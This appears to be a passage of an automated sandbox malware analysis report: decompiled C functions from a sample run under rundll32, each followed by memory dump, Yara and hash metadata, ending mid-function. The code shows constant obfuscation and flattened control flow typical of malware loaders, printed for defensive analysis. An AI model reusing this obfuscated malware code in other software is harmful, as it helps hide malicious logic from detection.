                                                                                                                                    				_v44 = 0x29044d;
                                                                                                                                    				_v24 = 0xea6416;
                                                                                                                                    				_v24 = _v24 | 0x7adbff7d;
                                                                                                                                    				_v24 = _v24 ^ 0x5afbff7f;
                                                                                                                                    				_v16 = 0x725236;
                                                                                                                                    				_v16 = _v16 + 0xffff3c91;
                                                                                                                                    				_v16 = _v16 << 7;
                                                                                                                                    				_t88 = 0x2b;
                                                                                                                                    				_v16 = _v16 / _t88;
                                                                                                                                    				_v16 = _v16 ^ 0x015653a2;
                                                                                                                                    				_v12 = 0xbf3984;
                                                                                                                                    				_v12 = _v12 ^ 0x457d3893;
                                                                                                                                    				_t89 = 0x44;
                                                                                                                                    				_v12 = _v12 / _t89;
                                                                                                                                    				_v12 = _v12 + 0x25bc;
                                                                                                                                    				_v12 = _v12 ^ 0x0106bc10;
                                                                                                                                    				_v20 = 0xd655eb;
                                                                                                                                    				_v20 = _v20 | 0x2344b0aa;
                                                                                                                                    				_v20 = _v20 * 0x16;
                                                                                                                                    				_v20 = _v20 ^ 0x147fb4df;
                                                                                                                                    				_v8 = 0x70d8dc;
                                                                                                                                    				_v8 = _v8 + 0xe534;
                                                                                                                                    				_v8 = _v8 ^ 0xb5155b0d;
                                                                                                                                    				_v8 = _v8 >> 7;
                                                                                                                                    				_v8 = _v8 ^ 0x01640b3f;
                                                                                                                                    				_v28 = 0x2d9f47;
                                                                                                                                    				_v28 = _v28 + 0xffffba71;
                                                                                                                                    				_v28 = _v28 ^ 0x002c2593;
                                                                                                                                    				_t77 = E002C94EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                    				return  ~_t77 & _v36;
                                                                                                                                    			}

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6Rr
                                                                                                                                    • API String ID: 0-3911282678
                                                                                                                                    • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                    • Instruction ID: 67d836abe34168bbfc386bffb2098744975d1a1244164c2b237446fd3825ecf5
                                                                                                                                    • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                    • Instruction Fuzzy Hash: 9731E1B1D1021EEBDB04CFA5C94A9EEFBB5FB44318F108699D121B6250D3B85B59CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002D8519(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				void* _t55;
                                                                                                                                    
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t55);
                                                                                                                                    				_v8 = 0x519131;
                                                                                                                                    				_v8 = _v8 ^ 0xec4619ea;
                                                                                                                                    				_v8 = _v8 + 0x48c3;
                                                                                                                                    				_v8 = _v8 ^ 0x9760daa2;
                                                                                                                                    				_v8 = _v8 ^ 0x7b7f7884;
                                                                                                                                    				_v16 = 0xb689a0;
                                                                                                                                    				_v16 = _v16 + 0x133d;
                                                                                                                                    				_v16 = _v16 ^ 0x00b72bb6;
                                                                                                                                    				_v12 = 0xec38eb;
                                                                                                                                    				_v12 = _v12 * 0x68;
                                                                                                                                    				_v12 = _v12 | 0x70f3e2c1;
                                                                                                                                    				_v12 = _v12 + 0xd290;
                                                                                                                                    				_v12 = _v12 ^ 0x7ff36ca2;
                                                                                                                                    				_v12 = 0x452aa4;
                                                                                                                                    				_v12 = _v12 ^ 0xbb670255;
                                                                                                                                    				_v12 = _v12 >> 1;
                                                                                                                                    				_v12 = _v12 * 0x2d;
                                                                                                                                    				_v12 = _v12 ^ 0x7280165f;
                                                                                                                                    				_v24 = 0xb68a33;
                                                                                                                                    				_v24 = _v24 + 0xffff2941;
                                                                                                                                    				_v24 = _v24 ^ 0x00b92c3b;
                                                                                                                                    				_v12 = 0x340add;
                                                                                                                                    				_v12 = _v12 | 0xd5e1d7f7;
                                                                                                                                    				_v12 = _v12 ^ 0xd5f6168b;
                                                                                                                                    				_v20 = 0x853d17;
                                                                                                                                    				_v20 = _v20 + 0xcd4d;
                                                                                                                                    				_v20 = _v20 ^ 0x00837917;
                                                                                                                                    				return E002CA30C(_v12, _a4, E002C1DB9(__ecx), _v20);
                                                                                                                                    			}

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 8
                                                                                                                                    • API String ID: 0-719543824
                                                                                                                                    • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                    • Instruction ID: a832ba77ed6089d174f58dabe8fcb4271001d7f7e35a774cf15270daa113d657
                                                                                                                                    • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                    • Instruction Fuzzy Hash: 0A21A2B5C00209EBCF48DFE5CA8689EBFB5FF40314F6081899411B6261D3B54B549F95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002C4346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				char _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				void* _t146;
                                                                                                                                    				void* _t165;
                                                                                                                                    				signed int _t170;
                                                                                                                                    				signed int _t171;
                                                                                                                                    				signed int _t172;
                                                                                                                                    				signed int _t173;
                                                                                                                                    				signed int _t174;
                                                                                                                                    				void* _t177;
                                                                                                                                    				intOrPtr* _t196;
                                                                                                                                    				void* _t197;
                                                                                                                                    				signed int* _t200;
                                                                                                                                    
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_t196 = __ecx;
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t146);
                                                                                                                                    				_v8 = 0x1587dd;
                                                                                                                                    				_t200 =  &(( &_v72)[4]);
                                                                                                                                    				_t197 = 0;
                                                                                                                                    				_v4 = _v4 & 0;
                                                                                                                                    				_t177 = 0x762b00a;
                                                                                                                                    				_v40 = 0x54d1b5;
                                                                                                                                    				_t170 = 0x79;
                                                                                                                                    				_v40 = _v40 / _t170;
                                                                                                                                    				_v40 = _v40 ^ 0x0000b372;
                                                                                                                                    				_v16 = 0xa1afdd;
                                                                                                                                    				_v16 = _v16 >> 0xd;
                                                                                                                                    				_v16 = _v16 ^ 0x0000050c;
                                                                                                                                    				_v68 = 0x910a11;
                                                                                                                                    				_t171 = 0x13;
                                                                                                                                    				_v68 = _v68 / _t171;
                                                                                                                                    				_v68 = _v68 << 2;
                                                                                                                                    				_v68 = _v68 + 0x13e3;
                                                                                                                                    				_v68 = _v68 ^ 0x00184f98;
                                                                                                                                    				_v32 = 0xaf4665;
                                                                                                                                    				_t172 = 0x26;
                                                                                                                                    				_v32 = _v32 * 0x1c;
                                                                                                                                    				_v32 = _v32 ^ 0x13220c8d;
                                                                                                                                    				_v56 = 0xf39368;
                                                                                                                                    				_v56 = _v56 + 0xf012;
                                                                                                                                    				_v56 = _v56 / _t172;
                                                                                                                                    				_v56 = _v56 ^ 0x000d8e66;
                                                                                                                                    				_v36 = 0xa121b7;
                                                                                                                                    				_v36 = _v36 + 0x3186;
                                                                                                                                    				_v36 = _v36 ^ 0x00aec580;
                                                                                                                                    				_v72 = 0x8bd634;
                                                                                                                                    				_t173 = 0x16;
                                                                                                                                    				_v72 = _v72 / _t173;
                                                                                                                                    				_v72 = _v72 | 0xc3992ef3;
                                                                                                                                    				_v72 = _v72 + 0xf49;
                                                                                                                                    				_v72 = _v72 ^ 0xc3912c07;
                                                                                                                                    				_v24 = 0xbc86c6;
                                                                                                                                    				_v24 = _v24 | 0x4f3bdf6c;
                                                                                                                                    				_v24 = _v24 ^ 0x4fbb36fd;
                                                                                                                                    				_v64 = 0xf11315;
                                                                                                                                    				_v64 = _v64 | 0x791eed70;
                                                                                                                                    				_v64 = _v64 + 0xffff781b;
                                                                                                                                    				_v64 = _v64 | 0xb4748ed7;
                                                                                                                                    				_v64 = _v64 ^ 0xfdf43fb6;
                                                                                                                                    				_v28 = 0xa9ea5e;
                                                                                                                                    				_v28 = _v28 << 9;
                                                                                                                                    				_v28 = _v28 ^ 0x53d38433;
                                                                                                                                    				_v44 = 0xab8ea7;
                                                                                                                                    				_t174 = 0x5e;
                                                                                                                                    				_v44 = _v44 / _t174;
                                                                                                                                    				_v44 = _v44 >> 5;
                                                                                                                                    				_v44 = _v44 ^ 0x00061aeb;
                                                                                                                                    				_v48 = 0xf3254f;
                                                                                                                                    				_v48 = _v48 + 0xffff7d1c;
                                                                                                                                    				_v48 = _v48 ^ 0x338af708;
                                                                                                                                    				_v48 = _v48 ^ 0x337c7814;
                                                                                                                                    				_v60 = 0xe02c97;
                                                                                                                                    				_v60 = _v60 * 0x4f;
                                                                                                                                    				_v60 = _v60 + 0xffffa06e;
                                                                                                                                    				_v60 = _v60 + 0x8165;
                                                                                                                                    				_v60 = _v60 ^ 0x4522059f;
                                                                                                                                    				_v52 = 0x13fe8b;
                                                                                                                                    				_v52 = _v52 >> 6;
                                                                                                                                    				_v52 = _v52 + 0xffffbd6d;
                                                                                                                                    				_v52 = _v52 ^ 0x000eeb0b;
                                                                                                                                    				_v20 = 0x7ee5fd;
                                                                                                                                    				_v20 = _v20 | 0xb1050693;
                                                                                                                                    				_v20 = _v20 ^ 0xb17ba1e4;
                                                                                                                                    				do {
                                                                                                                                    					while(_t177 != 0x29b5a10) {
                                                                                                                                    						if(_t177 == 0x761c4cc) {
                                                                                                                                    							_push(_t177);
                                                                                                                                    							_t165 = E002CAE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
                                                                                                                                    							_t200 =  &(_t200[0xa]);
                                                                                                                                    							if(_t165 != 0) {
                                                                                                                                    								_t177 = 0x29b5a10;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t177 == 0x762b00a) {
                                                                                                                                    								_t177 = 0x761c4cc;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t177 != 0x7f1be9f) {
                                                                                                                                    									goto L13;
                                                                                                                                    								} else {
                                                                                                                                    									_push(_t177);
                                                                                                                                    									E002CAE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
                                                                                                                                    									 *_t196 = _v12;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L6:
                                                                                                                                    						return _t197;
                                                                                                                                    					}
                                                                                                                                    					_push(_t177);
                                                                                                                                    					_push(_t177);
                                                                                                                                    					_t197 = E002C7FF2(_v12);
                                                                                                                                    					if(_t197 == 0) {
                                                                                                                                    						_t177 = 0xc410c1b;
                                                                                                                                    						goto L13;
                                                                                                                                    					} else {
                                                                                                                                    						_t177 = 0x7f1be9f;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L6;
                                                                                                                                    					L13:
                                                                                                                                    				} while (_t177 != 0xc410c1b);
                                                                                                                                    				goto L6;
                                                                                                                                    			}

































                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                    • Instruction ID: 65772eb5183ad3fa3dca97f192e152b5e210966dbfea031e2e65e363c0d8051b
                                                                                                                                    • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                    • Instruction Fuzzy Hash: 807154B21193019FD358DF21C98992BBBF1EBD4758F50890DF29556260D3B2C919CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002D894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				void* _t97;
                                                                                                                                    				void* _t111;
                                                                                                                                    				void* _t115;
                                                                                                                                    				void* _t117;
                                                                                                                                    				void* _t135;
                                                                                                                                    				void* _t136;
                                                                                                                                    				signed int _t137;
                                                                                                                                    				signed int _t138;
                                                                                                                                    				signed int _t139;
                                                                                                                                    				signed int _t140;
                                                                                                                                    				void* _t142;
                                                                                                                                    				void* _t143;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t115 = __edx;
                                                                                                                                    				_t135 = __ecx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t97);
                                                                                                                                    				_v64 = 0x51cd23;
                                                                                                                                    				_t143 = _t142 + 0x18;
                                                                                                                                    				_t136 = 0;
                                                                                                                                    				_t117 = 0x1f0121b;
                                                                                                                                    				_t137 = 0x4d;
                                                                                                                                    				_v64 = _v64 / _t137;
                                                                                                                                    				_v64 = _v64 >> 9;
                                                                                                                                    				_v64 = _v64 ^ 0x00032222;
                                                                                                                                    				_v68 = 0xd4b8b7;
                                                                                                                                    				_v68 = _v68 + 0xffffd2af;
                                                                                                                                    				_v68 = _v68 ^ 0xd36e67b3;
                                                                                                                                    				_v68 = _v68 ^ 0xd3b4aa1e;
                                                                                                                                    				_v76 = 0x6efd74;
                                                                                                                                    				_v76 = _v76 << 5;
                                                                                                                                    				_v76 = _v76 ^ 0x2f6bad1f;
                                                                                                                                    				_t138 = 0x34;
                                                                                                                                    				_v76 = _v76 / _t138;
                                                                                                                                    				_v76 = _v76 ^ 0x00af6c6b;
                                                                                                                                    				_v52 = 0x9958c4;
                                                                                                                                    				_v52 = _v52 + 0xffff4241;
                                                                                                                                    				_v52 = _v52 ^ 0x009a50fc;
                                                                                                                                    				_v56 = 0x2e84bf;
                                                                                                                                    				_t139 = 0x72;
                                                                                                                                    				_v56 = _v56 * 0x77;
                                                                                                                                    				_v56 = _v56 ^ 0x15969b56;
                                                                                                                                    				_v80 = 0x2bfbd3;
                                                                                                                                    				_v80 = _v80 | 0xbb654ab5;
                                                                                                                                    				_v80 = _v80 * 0x48;
                                                                                                                                    				_v80 = _v80 >> 8;
                                                                                                                                    				_v80 = _v80 ^ 0x00b72d27;
                                                                                                                                    				_v60 = 0xb8f349;
                                                                                                                                    				_v60 = _v60 / _t139;
                                                                                                                                    				_v60 = _v60 ^ 0xcb885b35;
                                                                                                                                    				_v60 = _v60 ^ 0xcb801a24;
                                                                                                                                    				_v72 = 0xbf562d;
                                                                                                                                    				_t140 = 0x42;
                                                                                                                                    				_v72 = _v72 / _t140;
                                                                                                                                    				_v72 = _v72 ^ 0xd5944d41;
                                                                                                                                    				_v72 = _v72 ^ 0x4a8545c0;
                                                                                                                                    				_v72 = _v72 ^ 0x9f1c34cb;
                                                                                                                                    				_v48 = 0xda7c79;
                                                                                                                                    				_v48 = _v48 << 0xc;
                                                                                                                                    				_v48 = _v48 ^ 0xa7c49699;
                                                                                                                                    				do {
                                                                                                                                    					while(_t117 != 0x1f0121b) {
                                                                                                                                    						if(_t117 == 0x20f75ec) {
                                                                                                                                    							E002C3DBC( &_v44, _t115, _v64, _v68, _v76);
                                                                                                                                    							_t143 = _t143 + 0xc;
                                                                                                                                    							_t117 = 0x98c428b;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t117 == 0x98c428b) {
                                                                                                                                    								_t111 = E002C2A21(_v52, _v56,  &_v44, _t135, _v80);
                                                                                                                                    								_t143 = _t143 + 0xc;
                                                                                                                                    								__eflags = _t111;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_t117 = 0xea94eac;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								_t149 = _t117 - 0xea94eac;
                                                                                                                                    								if(_t117 != 0xea94eac) {
                                                                                                                                    									goto L11;
                                                                                                                                    								} else {
                                                                                                                                    									E002DD97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
                                                                                                                                    									_t136 =  !=  ? 1 : _t136;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L6:
                                                                                                                                    						return _t136;
                                                                                                                                    					}
                                                                                                                                    					_t117 = 0x20f75ec;
                                                                                                                                    					L11:
                                                                                                                                    					__eflags = _t117 - 0x3544eb3;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L6;
                                                                                                                                    			}

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                    • Instruction ID: c43aa6a3270fbc676ea364345c1784c08dd3a6f5701cb4cfe99c4f078502c13a
                                                                                                                                    • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                    • Instruction Fuzzy Hash: 1C518872108301AFC754CF22C98681BBBE5FBD8748F50992EF59596260D772CA29CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002DAC3A(void* __ecx) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				void* _t82;
                                                                                                                                    				signed int _t85;
                                                                                                                                    				signed int _t86;
                                                                                                                                    				void* _t88;
                                                                                                                                    				void* _t96;
                                                                                                                                    				void* _t97;
                                                                                                                                    				signed int* _t99;
                                                                                                                                    
                                                                                                                                    				_t88 = __ecx;
                                                                                                                                    				_t99 =  &_v28;
                                                                                                                                    				_v24 = 0x5aa995;
                                                                                                                                    				_v24 = _v24 | 0x25663b9c;
                                                                                                                                    				_v24 = _v24 << 6;
                                                                                                                                    				_t85 = 0x11;
                                                                                                                                    				_v24 = _v24 / _t85;
                                                                                                                                    				_t96 = 0;
                                                                                                                                    				_v24 = _v24 ^ 0x05a97123;
                                                                                                                                    				_t97 = 0xfe6f9f;
                                                                                                                                    				_v16 = 0x9f09af;
                                                                                                                                    				_v16 = _v16 + 0xcb37;
                                                                                                                                    				_v16 = _v16 ^ 0x3a843722;
                                                                                                                                    				_v16 = _v16 ^ 0x3a14bc19;
                                                                                                                                    				_v28 = 0x7e93e4;
                                                                                                                                    				_v28 = _v28 << 0xa;
                                                                                                                                    				_t86 = 0x1a;
                                                                                                                                    				_v28 = _v28 / _t86;
                                                                                                                                    				_v28 = _v28 ^ 0x4056cd73;
                                                                                                                                    				_v28 = _v28 ^ 0x49f3cf3d;
                                                                                                                                    				_v4 = 0x47c602;
                                                                                                                                    				_v4 = _v4 ^ 0xe3aa640e;
                                                                                                                                    				_v4 = _v4 | 0xd85731ad;
                                                                                                                                    				_v4 = _v4 ^ 0xfbf46e2b;
                                                                                                                                    				_v8 = 0x201e29;
                                                                                                                                    				_v8 = _v8 << 0x10;
                                                                                                                                    				_v8 = _v8 * 0x48;
                                                                                                                                    				_v8 = _v8 ^ 0x7b8200e2;
                                                                                                                                    				_v12 = 0x18f9c1;
                                                                                                                                    				_v12 = _v12 * 0x54;
                                                                                                                                    				_v12 = _v12 << 6;
                                                                                                                                    				_v12 = _v12 ^ 0x0c72dcb8;
                                                                                                                                    				_v20 = 0xd6b502;
                                                                                                                                    				_v20 = _v20 * 0x55;
